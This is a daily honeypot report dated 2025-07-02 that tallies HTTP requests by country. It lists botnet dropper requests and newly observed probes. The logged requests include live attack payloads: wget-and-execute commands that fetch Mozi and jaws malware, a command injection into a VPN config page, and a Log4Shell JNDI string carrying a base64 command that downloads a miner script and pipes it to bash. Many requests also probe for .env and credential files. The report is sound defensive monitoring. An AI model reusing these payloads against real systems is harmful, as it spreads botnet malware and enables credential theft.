Daily Report: 2025-07-02#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).
There are 30 new requests that have never been observed before (these were added to the monitored request database.).
A total of 1568 requests were recorded during the day, originating from 3 different countries, with a peak of 634 requests coming from CH.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
| source_country | targeted_country |
|---|---|
| BR | Germany |
| US | Germany |
| US | Germany |
| JP | Germany |
| US | Germany |
| CH | Israel |
botnet_dropper_behaviour#
| remote_addr | request |
|---|---|
| 103.98.37.182 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
| 156.218.60.24 | GET /shell?cd+/tmp;rm+-rf+*;wget+38.57.46.116/jaws;sh+/tmp/jaws HTTP/1.1 |
| 95.214.53.84 | GET /vpn/list_base_config.php?type=mod&parts=base_config&template=`wget+http://220.158.234.135/x/raisecom+-O- |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
| number_of_occurence | request | |
|---|---|---|
| 194 | 2 | GET /dev/.env.aws HTTP/1.1 |
| 196 | 2 | GET /dev/.env.BAK HTTP/1.1 |
| 199 | 2 | GET /env/test.ini HTTP/1.1 |
| 201 | 2 | GET /helpers/.env HTTP/1.1 |
| 204 | 2 | GET /dev/.env.crt HTTP/1.1 |
| 209 | 2 | GET /keys/env.php HTTP/1.1 |
| 216 | 2 | GET /core/.env.db HTTP/1.1 |
| 218 | 2 | GET /dev/.env.bkp HTTP/1.1 |
| 219 | 2 | GET /cypress/.env HTTP/1.1 |
| 246 | 2 | GET /t%28%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==%7D%27%29 HTTP/1.1 |
| 264 | 2 | GET /cgi-bin/index.html HTTP/1.1 |
| 330 | 1 | GET /odinhttpcall1751449606 HTTP/1.1 |
| 331 | 1 | GET /OdinHttpCall1751449606 HTTP/1.1 |
| 332 | 1 | GET /Odin/http/call1751449606 HTTP/1.1 |
| 369 | 1 | GET /admin/.env.2 HTTP/1.1 |
| 383 | 1 | GET /database.env HTTP/1.1 |
| 384 | 1 | GET /flask/env.py HTTP/1.1 |
| 385 | 1 | GET /env/smtp.bak HTTP/1.1 |
| 388 | 1 | GET /dev/.env.gcp HTTP/1.1 |
| 389 | 1 | GET /dev/.env.key HTTP/1.1 |
| 391 | 1 | GET /dev/.env.log HTTP/1.1 |
| 392 | 1 | GET /dev/.env.new HTTP/1.1 |
| 393 | 1 | GET /.env_session HTTP/1.1 |
| 406 | 1 | GET /s/734323e21363e2932313e27353/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1 |
| 409 | 1 | GET /NadI HTTP/1.1 |
| 410 | 1 | GET /I3kv HTTP/1.1 |
| 436 | 1 | GET http://whatismyip.akamai.com/ HTTP/1.1 |
| 437 | 1 | GET /odinhttpcall1751457181 HTTP/1.1 |
| 438 | 1 | GET /OdinHttpCall1751457181 HTTP/1.1 |
| 439 | 1 | GET /Odin/http/call1751457181 HTTP/1.1 |
country_iso_code#
| number_of_occurence | country_iso_code | |
|---|---|---|
| 0 | 634 | CH |
| 1 | 276 | US |
| 2 | 143 | GB |
| 3 | 129 | DE |
| 4 | 57 | NL |
| 5 | 48 | BG |
| 6 | 46 | VN |
| 7 | 30 | JP |
| 8 | 22 | PL |
| 9 | 18 | CA |
| 10 | 17 | CN |
| 11 | 17 | ZA |
| 12 | 14 | RU |
| 13 | 11 | SC |
| 14 | 10 | DO |
| 15 | 9 | LT |
| 16 | 9 | BR |
| 17 | 8 | RO |
| 18 | 6 | AO |
| 19 | 5 | UA |
| 20 | 5 | GH |
| 21 | 5 | IN |
| 22 | 4 | SG |
| 23 | 4 | KR |
| 24 | 4 | HK |
| 25 | 4 | BE |
| 26 | 3 | IR |
| 27 | 3 | ES |
| 28 | 3 | NG |
| 29 | 3 | PT |
| 30 | 3 | KZ |
| 31 | 2 | TR |
| 32 | 2 | MN |
| 33 | 2 | SE |
| 34 | 2 | EE |
| 35 | 2 | IE |
| 36 | 2 | DZ |
| 37 | 2 | BD |
| 38 | 1 | EG |
| 39 | 1 | IT |
| 40 | 1 | FR |
| 41 | 1 | HR |